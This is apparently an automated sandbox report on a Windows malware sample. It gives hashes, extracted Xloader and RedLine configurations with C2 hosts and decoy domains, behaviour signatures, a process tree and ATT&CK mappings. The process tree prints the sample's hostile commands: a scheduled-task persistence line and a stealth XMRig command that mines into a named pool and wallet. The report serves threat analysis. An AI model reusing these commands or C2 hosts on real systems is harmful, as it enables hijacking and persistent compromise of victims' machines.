Analysis

  • max time kernel
    150s
  • max time network
    162s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    24-08-2021 11:44

General

  • Target

    e8d945d2105bad763f3b1dc30f2b6142.exe

  • Size

    395KB

  • MD5

    e8d945d2105bad763f3b1dc30f2b6142

  • SHA1

    4602b1216d9e6961f2398618bc525f54b45fa4c5

  • SHA256

    29175495787385b647e6982e1743e0d928e278b44554662100f53a26a4d97907

  • SHA512

    ae2ab2af1e798b33806e24b614382b4ebd98eb1f19d3731290a4f3463c15abb1847a8f442507d7b55c6cb2fa9e79732fb34dc313f5d9689ac15434d9d5858568

Malware Config

Extracted

Family

xloader

Version

2.3

Campaign

ec33

C2

http://www.chaturvedi.fyi/ec33/

Decoy

ride-hard.net

westindiesofficial.com

technewcomer.com

anwen.ink

smarthumanresource.com

aspenhillgetaway.com

westinventures.com

sercomp.pro

fitwoop.com

advertisingviews.site

stinato.com

kidsfundshoes.com

xaufuture.com

emaildesktophelp.com

hey-events.com

v-j9.com

eurekabox.net

export-rice.net

arcadems.com

thejackparker.com

Extracted

Family

redline

Botnet

3

C2

deyrolorme.xyz:80

xariebelal.xyz:80

anihelardd.xyz:80

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • Xloader

    Xloader is a rebranded version of Formbook malware.

  • suricata: ET MALWARE FormBook CnC Checkin (GET)

    suricata: ET MALWARE FormBook CnC Checkin (GET)

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 3 IoCs
  • Xloader Payload 3 IoCs
  • Executes dropped EXE 9 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 30 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 51 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:3016
    • C:\Users\Admin\AppData\Local\Temp\e8d945d2105bad763f3b1dc30f2b6142.exe
      "C:\Users\Admin\AppData\Local\Temp\e8d945d2105bad763f3b1dc30f2b6142.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3876
      • C:\Users\Admin\AppData\Local\Temp\JoBrowserSet 2.exe
        "C:\Users\Admin\AppData\Local\Temp\JoBrowserSet 2.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2368
        • C:\Users\Admin\AppData\Roaming\1685145.exe
          "C:\Users\Admin\AppData\Roaming\1685145.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2264
          • C:\Windows\system32\WerFault.exe
            C:\Windows\system32\WerFault.exe -u -p 2264 -s 2128
            5⤵
            • Program crash
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:360
        • C:\Users\Admin\AppData\Roaming\1240019.exe
          "C:\Users\Admin\AppData\Roaming\1240019.exe"
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of WriteProcessMemory
          PID:2712
          • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
            "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
            5⤵
            • Executes dropped EXE
            PID:3112
        • C:\Users\Admin\AppData\Roaming\1658729.exe
          "C:\Users\Admin\AppData\Roaming\1658729.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4024
      • C:\Users\Admin\AppData\Local\Temp\Chrome4.exe
        "C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2700
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1628
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
            5⤵
            • Creates scheduled task(s)
            PID:4060
        • C:\Users\Admin\AppData\Roaming\services64.exe
          "C:\Users\Admin\AppData\Roaming\services64.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1096
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2116
            • C:\Windows\system32\schtasks.exe
              schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
              6⤵
              • Creates scheduled task(s)
              PID:2196
          • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
            "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
            5⤵
            • Executes dropped EXE
            PID:2256
          • C:\Windows\explorer.exe
            C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.admin/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BOVf8GOEpqsYJf392VKwN2gwsZ1d06Df9J2hBJw9kUq" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2540
      • C:\Users\Admin\AppData\Local\Temp\bin.exe
        "C:\Users\Admin\AppData\Local\Temp\bin.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        PID:3760
    • C:\Windows\SysWOW64\cmmon32.exe
      "C:\Windows\SysWOW64\cmmon32.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1908
      • C:\Windows\SysWOW64\cmd.exe
        /c del "C:\Users\Admin\AppData\Local\Temp\bin.exe"
        3⤵
          PID:2308

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Credentials in Files

    2
    T1081

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    1
    T1082

    Collection

    Data from Local System

    2
    T1005

    Command and Control

    Web Service

    1
    T1102

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Chrome4.exe
      MD5

      6d997a345651126bf81cfa573268ef6b

      SHA1

      04813a5732d71d719430e43c34eb5c6ad10695ab

      SHA256

      55a0f9afd26e0b723a91d7198ff10309380831787eaa661c0d3875439ac7c9b3

      SHA512

      988da4a0ff8340fc0d6f23e4fa9f361ebc6d48707363a113d45f76fd3172decc2428f7c5149eeba67fa97aeb8c0fffd15a787da0a39b9b324a6158c32d9b674d

    • C:\Users\Admin\AppData\Local\Temp\Chrome4.exe
      MD5

      6d997a345651126bf81cfa573268ef6b

      SHA1

      04813a5732d71d719430e43c34eb5c6ad10695ab

      SHA256

      55a0f9afd26e0b723a91d7198ff10309380831787eaa661c0d3875439ac7c9b3

      SHA512

      988da4a0ff8340fc0d6f23e4fa9f361ebc6d48707363a113d45f76fd3172decc2428f7c5149eeba67fa97aeb8c0fffd15a787da0a39b9b324a6158c32d9b674d

    • C:\Users\Admin\AppData\Local\Temp\JoBrowserSet 2.exe
      MD5

      61fd8e96260e4fffb555d16085c818a8

      SHA1

      2f7a6a9d4d2f0c1e347222ca7e0d863d88104e5b

      SHA256

      8e2098f566177904903e9b219a595af6cd948b7d00fe12aed8545ea1cc4ebd59

      SHA512

      9d0772ad0494e3fa451bba3e20e72bff292271c4ad3a06c4bfac38c692421f5d43d5468d251d796f92bfb60eff4c70700c82374d11b7a3cbf199fc14843e7ee4

    • C:\Users\Admin\AppData\Local\Temp\JoBrowserSet 2.exe
      MD5

      61fd8e96260e4fffb555d16085c818a8

      SHA1

      2f7a6a9d4d2f0c1e347222ca7e0d863d88104e5b

      SHA256

      8e2098f566177904903e9b219a595af6cd948b7d00fe12aed8545ea1cc4ebd59

      SHA512

      9d0772ad0494e3fa451bba3e20e72bff292271c4ad3a06c4bfac38c692421f5d43d5468d251d796f92bfb60eff4c70700c82374d11b7a3cbf199fc14843e7ee4

    • C:\Users\Admin\AppData\Local\Temp\bin.exe
      MD5

      9efb46ac666bf0cd1b417f69e58151d5

      SHA1

      79cf36a9cc63bded573593a0aa93bad550d10e30

      SHA256

      fe1f35c815222d77527faddd4b99c9a697b2fb8fe27cd45c50b5f6ca499cce63

      SHA512

      33188085909fea6fc6f646a5e8cd217abbe07cdf1ddbf48d7099b8992a6ef8cab8536606d4f6eb77bb18ad0e71d9c1287ce5855c6f436a1eb13ed6639c2e959a

    • C:\Users\Admin\AppData\Local\Temp\bin.exe
      MD5

      9efb46ac666bf0cd1b417f69e58151d5

      SHA1

      79cf36a9cc63bded573593a0aa93bad550d10e30

      SHA256

      fe1f35c815222d77527faddd4b99c9a697b2fb8fe27cd45c50b5f6ca499cce63

      SHA512

      33188085909fea6fc6f646a5e8cd217abbe07cdf1ddbf48d7099b8992a6ef8cab8536606d4f6eb77bb18ad0e71d9c1287ce5855c6f436a1eb13ed6639c2e959a

    • C:\Users\Admin\AppData\Roaming\1240019.exe
      MD5

      3598180fddc06dbd304b76627143b01d

      SHA1

      1d39b0dd8425359ed94e606cb04f9c5e49ed1899

      SHA256

      44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda

      SHA512

      8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d

    • C:\Users\Admin\AppData\Roaming\1240019.exe
      MD5

      3598180fddc06dbd304b76627143b01d

      SHA1

      1d39b0dd8425359ed94e606cb04f9c5e49ed1899

      SHA256

      44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda

      SHA512

      8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d

    • C:\Users\Admin\AppData\Roaming\1658729.exe
      MD5

      883fe31989c8dfc8f2e22a94ae2d369a

      SHA1

      2933d6fafbebe84c12c0e226bf182e708d3bd32e

      SHA256

      7781a758350e3fba94c86661171371a7fd19f0801bf4cc82c5c94169fed3b9b4

      SHA512

      c9d4ee4ba7e34c4641b25837295a8d7ea6c04f5d25facd9948bb19698e75a833e16f530d6be59fe6cb9d2c5771a1e7e10266adbb121ce1822e1048530e67e313

    • C:\Users\Admin\AppData\Roaming\1658729.exe
      MD5

      883fe31989c8dfc8f2e22a94ae2d369a

      SHA1

      2933d6fafbebe84c12c0e226bf182e708d3bd32e

      SHA256

      7781a758350e3fba94c86661171371a7fd19f0801bf4cc82c5c94169fed3b9b4

      SHA512

      c9d4ee4ba7e34c4641b25837295a8d7ea6c04f5d25facd9948bb19698e75a833e16f530d6be59fe6cb9d2c5771a1e7e10266adbb121ce1822e1048530e67e313

    • C:\Users\Admin\AppData\Roaming\1685145.exe
      MD5

      463bac4a842400e537500a5a20fbe6a8

      SHA1

      7ea66b11085e4b3626223e5573cae4c6ca421c89

      SHA256

      d20c700b389f6a95c9acb4b0401bbf6f7b24b6854e52d07ab05b05f4fd07d5da

      SHA512

      0fe50b8358d33df1564bc41aadc7f3f87c002517fbfbb1ae453a2c3ca89c8605cebde40ee17e130caf69b090be79dc9b0c7e6966bba1bbae3e02c6056518edc3

    • C:\Users\Admin\AppData\Roaming\1685145.exe
      MD5

      463bac4a842400e537500a5a20fbe6a8

      SHA1

      7ea66b11085e4b3626223e5573cae4c6ca421c89

      SHA256

      d20c700b389f6a95c9acb4b0401bbf6f7b24b6854e52d07ab05b05f4fd07d5da

      SHA512

      0fe50b8358d33df1564bc41aadc7f3f87c002517fbfbb1ae453a2c3ca89c8605cebde40ee17e130caf69b090be79dc9b0c7e6966bba1bbae3e02c6056518edc3

    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      MD5

      7f7246cca411275a62d7fdee50877859

      SHA1

      7e3a4e01f44ce712426a04fc2719ea7460304788

      SHA256

      989cd0b0c561c9a08e23574dd47d6b32273ecf778dfa222ec1db3865e56cac1b

      SHA512

      f11e8657593fd786a3f05566a60c71cd53e80a10ce3013f61d3a020d956a98d24ee598e1acb77ed87bee23fc217a3aeef068810aad636f17da473be8d3a2e1c7

    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
      MD5

      7f7246cca411275a62d7fdee50877859

      SHA1

      7e3a4e01f44ce712426a04fc2719ea7460304788

      SHA256

      989cd0b0c561c9a08e23574dd47d6b32273ecf778dfa222ec1db3865e56cac1b

      SHA512

      f11e8657593fd786a3f05566a60c71cd53e80a10ce3013f61d3a020d956a98d24ee598e1acb77ed87bee23fc217a3aeef068810aad636f17da473be8d3a2e1c7

    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
      MD5

      3598180fddc06dbd304b76627143b01d

      SHA1

      1d39b0dd8425359ed94e606cb04f9c5e49ed1899

      SHA256

      44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda

      SHA512

      8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d

    • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
      MD5

      3598180fddc06dbd304b76627143b01d

      SHA1

      1d39b0dd8425359ed94e606cb04f9c5e49ed1899

      SHA256

      44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda

      SHA512

      8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d

    • C:\Users\Admin\AppData\Roaming\services64.exe
      MD5

      6d997a345651126bf81cfa573268ef6b

      SHA1

      04813a5732d71d719430e43c34eb5c6ad10695ab

      SHA256

      55a0f9afd26e0b723a91d7198ff10309380831787eaa661c0d3875439ac7c9b3

      SHA512

      988da4a0ff8340fc0d6f23e4fa9f361ebc6d48707363a113d45f76fd3172decc2428f7c5149eeba67fa97aeb8c0fffd15a787da0a39b9b324a6158c32d9b674d

    • C:\Users\Admin\AppData\Roaming\services64.exe
      MD5

      6d997a345651126bf81cfa573268ef6b

      SHA1

      04813a5732d71d719430e43c34eb5c6ad10695ab

      SHA256

      55a0f9afd26e0b723a91d7198ff10309380831787eaa661c0d3875439ac7c9b3

      SHA512

      988da4a0ff8340fc0d6f23e4fa9f361ebc6d48707363a113d45f76fd3172decc2428f7c5149eeba67fa97aeb8c0fffd15a787da0a39b9b324a6158c32d9b674d

    • memory/1096-192-0x0000000000000000-mapping.dmp
    • memory/1096-206-0x0000000000A20000-0x0000000000A22000-memory.dmp
      Filesize

      8KB

    • memory/1628-189-0x0000000000000000-mapping.dmp
    • memory/1908-173-0x0000000000000000-mapping.dmp
    • memory/1908-175-0x0000000000CC0000-0x0000000000CCC000-memory.dmp
      Filesize

      48KB

    • memory/1908-177-0x0000000004CC0000-0x0000000004FE0000-memory.dmp
      Filesize

      3.1MB

    • memory/1908-185-0x0000000004B40000-0x0000000004BCF000-memory.dmp
      Filesize

      572KB

    • memory/1908-176-0x0000000000BC0000-0x0000000000BE8000-memory.dmp
      Filesize

      160KB

    • memory/2116-199-0x0000000000000000-mapping.dmp
    • memory/2196-201-0x0000000000000000-mapping.dmp
    • memory/2256-200-0x0000000000000000-mapping.dmp
    • memory/2256-207-0x000000001C760000-0x000000001C762000-memory.dmp
      Filesize

      8KB

    • memory/2256-204-0x0000000000B70000-0x0000000000B71000-memory.dmp
      Filesize

      4KB

    • memory/2264-148-0x000000001AB70000-0x000000001ABBA000-memory.dmp
      Filesize

      296KB

    • memory/2264-153-0x0000000000AF0000-0x0000000000AF2000-memory.dmp
      Filesize

      8KB

    • memory/2264-133-0x0000000000000000-mapping.dmp
    • memory/2264-137-0x0000000000220000-0x0000000000221000-memory.dmp
      Filesize

      4KB

    • memory/2308-174-0x0000000000000000-mapping.dmp
    • memory/2368-130-0x0000000002C80000-0x0000000002C9E000-memory.dmp
      Filesize

      120KB

    • memory/2368-119-0x0000000000C80000-0x0000000000C81000-memory.dmp
      Filesize

      4KB

    • memory/2368-131-0x0000000002CA0000-0x0000000002CA1000-memory.dmp
      Filesize

      4KB

    • memory/2368-132-0x0000000002CB0000-0x0000000002CB2000-memory.dmp
      Filesize

      8KB

    • memory/2368-116-0x0000000000000000-mapping.dmp
    • memory/2368-127-0x0000000002C70000-0x0000000002C71000-memory.dmp
      Filesize

      4KB

    • memory/2540-209-0x00000001402F327C-mapping.dmp
    • memory/2540-210-0x00000000006E0000-0x0000000000700000-memory.dmp
      Filesize

      128KB

    • memory/2540-211-0x0000000140000000-0x0000000140763000-memory.dmp
      Filesize

      7.4MB

    • memory/2540-214-0x0000000000720000-0x0000000000740000-memory.dmp
      Filesize

      128KB

    • memory/2540-215-0x0000000015890000-0x0000000015940000-memory.dmp
      Filesize

      704KB

    • memory/2540-208-0x0000000140000000-0x0000000140763000-memory.dmp
      Filesize

      7.4MB

    • memory/2540-216-0x0000000002260000-0x0000000002280000-memory.dmp
      Filesize

      128KB

    • memory/2700-191-0x0000000001130000-0x0000000001132000-memory.dmp
      Filesize

      8KB

    • memory/2700-124-0x0000000000900000-0x0000000000901000-memory.dmp
      Filesize

      4KB

    • memory/2700-120-0x0000000000000000-mapping.dmp
    • memory/2700-188-0x00000000011D0000-0x00000000011D1000-memory.dmp
      Filesize

      4KB

    • memory/2700-187-0x0000000001100000-0x000000000110A000-memory.dmp
      Filesize

      40KB

    • memory/2712-136-0x0000000000000000-mapping.dmp
    • memory/2712-152-0x0000000007690000-0x0000000007691000-memory.dmp
      Filesize

      4KB

    • memory/2712-149-0x0000000007AA0000-0x0000000007AA1000-memory.dmp
      Filesize

      4KB

    • memory/2712-143-0x0000000000960000-0x0000000000961000-memory.dmp
      Filesize

      4KB

    • memory/2712-146-0x0000000004FA0000-0x0000000004FA6000-memory.dmp
      Filesize

      24KB

    • memory/3016-151-0x0000000004DB0000-0x0000000004F39000-memory.dmp
      Filesize

      1.5MB

    • memory/3016-186-0x0000000004F40000-0x00000000050A0000-memory.dmp
      Filesize

      1.4MB

    • memory/3112-170-0x00000000054B0000-0x00000000054B1000-memory.dmp
      Filesize

      4KB

    • memory/3112-156-0x0000000000000000-mapping.dmp
    • memory/3112-169-0x0000000007D10000-0x0000000007D11000-memory.dmp
      Filesize

      4KB

    • memory/3760-150-0x0000000001040000-0x0000000001050000-memory.dmp
      Filesize

      64KB

    • memory/3760-147-0x0000000001240000-0x0000000001560000-memory.dmp
      Filesize

      3.1MB

    • memory/3760-126-0x0000000000000000-mapping.dmp
    • memory/3876-114-0x0000000000990000-0x0000000000991000-memory.dmp
      Filesize

      4KB

    • memory/4024-171-0x0000000005770000-0x0000000005771000-memory.dmp
      Filesize

      4KB

    • memory/4024-178-0x0000000009350000-0x0000000009351000-memory.dmp
      Filesize

      4KB

    • memory/4024-159-0x00000000056F0000-0x0000000005722000-memory.dmp
      Filesize

      200KB

    • memory/4024-163-0x0000000007C90000-0x0000000007C91000-memory.dmp
      Filesize

      4KB

    • memory/4024-167-0x0000000007CF0000-0x0000000007CF1000-memory.dmp
      Filesize

      4KB

    • memory/4024-168-0x0000000007D30000-0x0000000007D31000-memory.dmp
      Filesize

      4KB

    • memory/4024-154-0x0000000000ED0000-0x0000000000ED1000-memory.dmp
      Filesize

      4KB

    • memory/4024-182-0x00000000099D0000-0x00000000099D1000-memory.dmp
      Filesize

      4KB

    • memory/4024-180-0x0000000009520000-0x0000000009521000-memory.dmp
      Filesize

      4KB

    • memory/4024-172-0x0000000007EE0000-0x0000000007EE1000-memory.dmp
      Filesize

      4KB

    • memory/4024-162-0x0000000008280000-0x0000000008281000-memory.dmp
      Filesize

      4KB

    • memory/4024-179-0x0000000009A50000-0x0000000009A51000-memory.dmp
      Filesize

      4KB

    • memory/4024-140-0x0000000000000000-mapping.dmp
    • memory/4024-184-0x0000000009FA0000-0x0000000009FA1000-memory.dmp
      Filesize

      4KB

    • memory/4060-190-0x0000000000000000-mapping.dmp